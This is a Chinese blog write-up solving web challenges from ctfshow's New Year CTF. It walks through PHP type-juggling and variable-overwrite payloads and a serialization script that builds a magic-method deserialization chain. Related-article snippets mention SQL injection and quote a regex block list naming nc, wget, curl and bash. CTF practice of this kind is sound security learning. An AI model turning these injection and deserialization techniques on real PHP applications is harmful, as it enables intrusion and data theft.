CTFSHOW 年CTF(web部分)

最新推荐文章于 2024-06-05 19:48:43 发布
最新推荐文章于 2024-06-05 19:48:43 发布
阅读量1.7k 收藏 4
点赞数 2
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/miuzzx/article/details/128787159
版权

除夕

科学计数法绕过
payload
?year=202.2e1

初三

考的变量覆盖。
首先来看下这个函数

$_=function($__,$___){
    return $__==$___?$___:$__;
};

作用比较明显,接收两个参数,如果两个参数弱相等则返回第二个参数,否则返回第一个参数。
接着往下看

$$__($_($_GET{
    $___
}[$____]{
    $_____
}(),$flag));

先来看里面的这一部分

$_($_GET{
    $___
}[$____]{
    $_____
}(),$flag)

其实就是调用了刚才说的自定义函数,他的第一个参数是

$_GET{
    $___
}[$____]{
    $_____
}()

第二个参数是$flag
那么如果第一个参数整体可控的话让他弱等于$flag就可以了。
不过这只是返回值,没有回显的。
所以我们可以让最外层的$$__是个可打印的函数,比如var_dump
所以可以确定的是__=z&z=var_dump
再看里面的应该怎么传,$_GET{$___}[$____]{$_____}
中括号花括号一样的用法,简化下$_GET[$___][$____][$_____]
其实就是个三维数组嘛,可以直接传
x[b][c]=phpinfo&___=x&____=b&_____=c
这样最终$_GET[$___][$____][$_____]的值就是phpinfo。
为啥选phpinfo呢,以为phpinfo的返回值是true。
所以最终payload
?__=z&z=var_dump&x[b][c]=phpinfo&___=x&____=b&_____=c

初六

先来看最终利用点

    function __get($arg){
        global $flag;
        $arg="get".$arg;
        $this->$arg = $flag;
        return $this->secret;
    }

在这个地方
$flag给了$this->$arg,并且同时触发了__set魔术方法

    function __set($arg,$argv){
        $this->secret=base64_encode($arg.$argv);
        
    }

在__set魔术方法中 $arg就是get,$argv就是$flag
最终将secret的值和flag联系了起来。
所以现在的目的就是怎么进get。
我们知道要触发这个魔术方法,要么是调用不存在的属性,要么调用私有变量。
很明显需要进入invoke,而invoke需要把对象当作函数处理。
可以看到在__call魔术方法中的$this->key我们是可控的,只要赋值成当前对象就可以了。
然后想触发__call就得调用不存在的函数,就需要进__toString魔术方法,里面有个$this->secret()
想进__toString就得把对象当作字符串处理,在createSecret中存在变量的拼接。而createSecret又是在getSecret中调用的。
所以整条链就完整了。
payload

<?php 
class happy2year{

        private $secret;
        private $key;
        function __construct(){
                $this->key=$this;
        }
}

echo urlencode(serialize(new happy2year()));

实际上payload很简单,但是整个过程比较复杂,还是比较有意思的一道题。

yu22x
关注
2024网络安全最全ctfshow-WEB-web5_ctfshow web5
2401_84281698的博客
05-03 541
ctf.show WEB模块第5关需要传递两个参数,一个字符串,一个数字,并且两个参数的md5值必须相同,我们可以利用md5的0e漏洞进行绕过0e绕过是指:0e开头的字符串在参与弱类型比较时,会被当做科学计数法,结果转换为0;我们只要传入两个md5值是以0e开头的参数,即可绕过md5加密,夺取flag页面中展示了部分源码,从源码中我们可以得知,想要夺旗需要通过GET请求传递两个参数v1和v2,并且参数v1必须是纯字母字符串,参数v2必须是数字或者数字字符串,并且两个参数的md5值必须相等。
2024网安最新ctfshow-WEB-web6_ctf(1)
2401_84297899的博客
05-03 1015
ctf.show WEB模块第6关是一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输成功登录既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用获取当前使用的数据库,用户名输入以下payload,密码随便输当前数据库是web2。
ctfshow ctf
qq_61768489的博客
02-10 853
来设置私有属性,给一个未定义的属性赋值时,触发__set(),传递的参数是被设置的属性名和值.所以,2023是兔,密码也是。聪明的小伙伴们,你能破解出下面的密码吗?老g师傅最近发现了一个有趣的ctf工具,你能找出flag吗?据说上面的无线电信号代表的是中文,由红岸基地发往半人马星系。弱比较和强比较的问题 2023那里是强比较,还是很容易的。里面的$this->key,为happy2year类。还有个(),所以是个无参函数, 有个trick是。虽然exp比较简单,但是里面的逻辑挺值得学习的。
ctfshow_ctf-wp
网安小菜鸡
01-30 827
ctfshowctf2023-wp
CTFshow_CTF 2023
weixin_45908624的博客
01-28 815
_CTF
CTFshow:CTF 除夕、初一、初二、初五
qq_26961571的博客
06-05 497
然而,php内核的开发者原本是想让程序员借由这种不需要声明的体系,更加高效的开发,所以在几乎所有内置函数以及基本结构中使用了很多松散的比较和转换,防止程序中的变量因为程序员的不规范而频繁的报错,然而这却带来了安全问题。仓颉码的设计,主要的目标,就是为了建立中文的索引观念。仓颉码的索引,是以 ASCII的字符码为基准,但为了程式的处理,在内部转换为 十六进位值,我们称之为「序码」。当源代码进行一些未限制类型的比较,或数学运算的时候,可能会导致zval.type的改变,同时影响zval.value的内容改变。
CTF秀--CTF
m0_59022585的博客
07-11 130
打开链接对PHP代码分析,使year=2022.时,==判断前先转换成字符串型判断为真,year+1后为浮点型,!==判断也为真,得到flag。通过分析密文首部和提示可以知道使用了Rabbit(兔)加密,提示也给出了密码(2023),使用Rabbit解密得到flag。
2024网安最全ctfshow-WEB-web6_ctf(3)
2401_84264583的博客
05-03 748
先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输成功登录既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用获取当前使用的数据库,用户名输入以下payload,密码随便输当前数据库是web2接下来获取数据库中的所有表,用户名输入一下payload,密码随便输,如果直接复制payload,记得删掉内容中的空格等特殊字符,尽量使整个内容保持在一行,否则空格或换行符会使结果出错成功获取数据库中的表 flag , user。
CTFshow php特性 web139
Kradress的博客
12-18 590
目录源码思路题解题解一题解二总结 源码 <?php error_reporting(0); function check($x){ if(preg_match('/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i', $x)){ die(
2024ctfshow-WEB-web2_ctf
2401_84252281的博客
05-01 255
首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输接下来,我们修改payload中2的位置,就可以将数据回显到页面中了,下面获取当前使用的数据库,盲猜flag就藏在当前使用的数据库中数据库有了,接下来是脱表,在用户名的输入框中输入一下payload,密码还是随便输接下来获取flag表的字段接下来获取flag表的数据。
每天CTF小练一点--ctfshowCTF
最新发布
2301_80284843的博客
06-05 239
有两个解不出来,但是可以通过解出来的文字猜测。这种题解不出来的时候,就要充分获取题目信息。
2021/10/27--2021/10/29CTF命令执行ctfshow
A的博客
10-27 2338
eval($c);经过过滤,传入参数执行
ctfshow-_ctf初一初二
qq_47804678的博客
03-22 314
)弱比较会自动将两边转换成同一类型,只需要比较值是否相等;==)强比较是值和类型都会进行比较。所以我们可以将year=2022.0,在比较时值相同但是类型不同,刚好能通过,最后得到flag。
ctfshow 2022新春迎新赛(详细解说)
qq_50589021的博客
02-11 1508
ctfshow 新春迎新赛 热身 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-01-16 15:42:02 # @Last Modified by: h1xa # @Last Modified time: 2022-01-24 22:14:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ eval($_GET['f']); 直接写一句话:?
ctfshow 新欢乐赛WP
博客地址 www.sec0nd.top
02-21 613
文章目录热身方法一方法二web1web2web3web4 热身 <?php eval($_GET['f']); 方法一 打开之后先查看phpinfo() 直接可以代码执行,从phpinfo里面找到flag的位置(自动包含的文件) 输出即可得flag 方法二 第二种思路是,查看当前页面得变量,直接出flag ?f=print_r(get_defined_vars()); web1 <?php highlight_file(__FILE__); error_reporting(0);
CTF题记—ctfshow&&BUU
m0re's blog
10-03 2732
web19 题目描述:密钥什么的,就不要放在前端了 打开题目是登录框,第一想法是去尝试了万能密码。但是没有成功。然后才回过头看题目描述是前端有密钥。所以就看源代码。 上面是加密方法,百度发现是前端AES加密。它会将用户输入的密码字符串进行加密。两种可行方法,第一种是解密,先百度,然后这样这样,再那样那样就解出来了。(没有使用这种)。第二种是抓包修改,绕过前端验证。将密钥修改为$p的字符串。发包得到flag web 7、8 题目描述:版本控制很重要,但不要部署到生产环境更重要。 版本信息部署到生产环境,两
【转】一个4CTF入门者自述:曾经掉过的坑与干货总结
knaha的博客
07-09 4133
转载自 https://zhuanlan.zhihu.com/p/21685384?utm_source=qq&utm_medium=social&utm_oi=791204951979339776 一个巧合的机会,成为了CTF夺旗爱好者,一个ctf小白。从12开始国内大大小小的CTF比赛我都看过,那会还没有统一叫CTF,都是叫 网络攻防赛、信息安全赛之类的,目的就是为了通过技...
ctfshow web由一道题的思路实现通杀
weixin_52555162的博客
02-21 4651
ctfshow萌新计划 题目:web1 代码很安全,没有漏洞 打开题目很显然这一题考察的是代码审计,我们把代码粘贴下来审计一波 <html> <head> <title>ctf.show萌新计划web1</title> <meta charset="utf-8"> </head> <body> <?php # 包含数据库连接文件 include("config.php"); # 判断g.
CTFShow web1-7——CTFWEB模块解题思路
热门推荐
wangyuxiang946的博客
09-15 1万+
CTFShow WEB模块详细通关教程, 受篇幅所限, 通关教程分为上下两部分, 第一部分为1-7关, 第二部分为8-14关, 本篇博客为1-7关的通关教程, 从解题思路和所用到的知识点两个方面进行讲解 CTFShow web1-7关详细教程解题思路CTFShow web签到题CTFShow web2CTFShow web3CTFShow web4CTFShow web5CTFShow web6CTFShow web7知识点php://input伪协议日志注入MD5加密漏洞-0e绕过过滤空格的绕过方式 .
ctfshow web入门 web11
12-12
根据提供的引用内容,我们可以得知ctfshow web入门系列共有20道题目,其中web11是其中的一道题目。由于没有提供具体的题目描述,我无法给出具体的解答。但是,我可以为您提供一些解决CTF Web题目的一般性建议: 1....
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值